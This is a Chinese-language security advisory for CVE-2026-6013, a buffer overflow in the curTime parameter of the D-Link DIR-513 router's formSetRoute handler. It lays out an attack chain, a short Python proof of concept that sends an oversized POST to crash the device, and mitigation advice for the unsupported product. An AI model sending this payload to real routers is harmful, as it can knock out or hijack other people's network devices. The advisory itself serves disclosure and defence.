CVE-2026-6013 D-Link DIR-513 缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-6013

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-513

漏洞概述

D-Link DIR-513路由器1.10版本存在严重的安全漏洞。问题出在/goform/formSetRoute组件的POST请求处理函数中，由于未对用户输入的curTime参数进行严格的边界检查，导致缓冲区溢出。远程攻击者无需用户交互即可利用此漏洞，可能造成设备拒绝服务或远程代码执行。鉴于该设备已停止官方支持，建议用户尽快更换新设备以规避风险。

技术细节

该漏洞技术根源在于D-Link DIR-513固件中Web服务器对HTTP POST请求参数的校验缺失。在/goform/formSetRoute接口对应的后端处理函数formSetRoute中，程序通过标准CGI机制获取用户提交的curTime参数。在将此字符串拷贝到局部变量时，使用了不安全的内存拷贝函数（如strcpy），且未校验输入长度是否超过目标缓冲区大小。由于该服务通常运行在高权限上下文中，攻击者通过发送精心构造的畸形HTTP POST数据包，可引发栈溢出，进而覆盖函数返回地址。利用该漏洞，攻击者可以在设备上下文中执行任意Shell命令，完全接管路由器控制权。由于攻击无需用户交互且可远程发起，结合其已公开的利用代码，该漏洞具有极高的实际被利用风险。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出存在D-Link DIR-513路由器的目标IP地址及开放的管理端口（通常为80/443）。

STEP 2

武器化

攻击者构造恶意的HTTP POST数据包，其中包含超长的curTime参数字符串，旨在覆盖栈上的返回地址。

STEP 3

传递

攻击者通过互联网或局域网，将构造好的恶意请求发送至目标设备的/goform/formSetRoute接口。

STEP 4

利用

设备处理请求时，由于未检查长度，curTime参数导致缓冲区溢出，覆盖关键寄存器，劫持程序控制流。

STEP 5

控制

攻击者成功注入Shellcode或跳转到特定指令，在设备上执行任意代码，获得路由器的最高权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_ip):
    """
    PoC for CVE-2026-6013 Buffer Overflow in D-Link DIR-513
    Sends a malicious payload to the curTime parameter.
    """
    url = f"http://{target_ip}/goform/formSetRoute"
    # The buffer size is limited, sending a long string to trigger overflow
    # Adjust length based on specific buffer analysis (e.g., 300+ bytes)
    payload = {
        "curTime": "A" * 500
    }
    
    try:
        print(f"[+] Sending payload to {target_ip}...")
        response = requests.post(url, data=payload, timeout=5)
        print(f"[+] Server responded with status code: {response.status_code}")
        if response.status_code == 200 or response.status_code == 500:
            print("[!] Potential trigger of vulnerability. Check device status.")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        print("[!] The device might have crashed (DoS).")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit_poc(target)

影响范围

D-Link DIR-513 1.10

防御指南

临时缓解措施

由于厂商已停止支持该产品，无法获得官方补丁。建议用户立即禁用路由器的远程管理功能，仅在局域网内进行管理，并配置严格的防火墙规则，阻止对设备Web管理端口的非信任访问。最彻底的解决方案是更换仍在维护周期内的现代路由器设备。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6013
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6013
3 Details https://www.cvedetails.com/cve/CVE-2026-6013/
4 VulDB https://vuldb.com/cve/CVE-2026-6013
5 Link https://lavender-bicycle-a5a.notion.site/D-Link-DIR-513-formSetRoute-33153a41781f80f7aed1d3614c199d85?source=copy_link
6 Link https://vuldb.com/submit/791859
7 Link https://vuldb.com/vuln/356569
8 Link https://vuldb.com/vuln/356569/cti
9 Link https://www.dlink.com/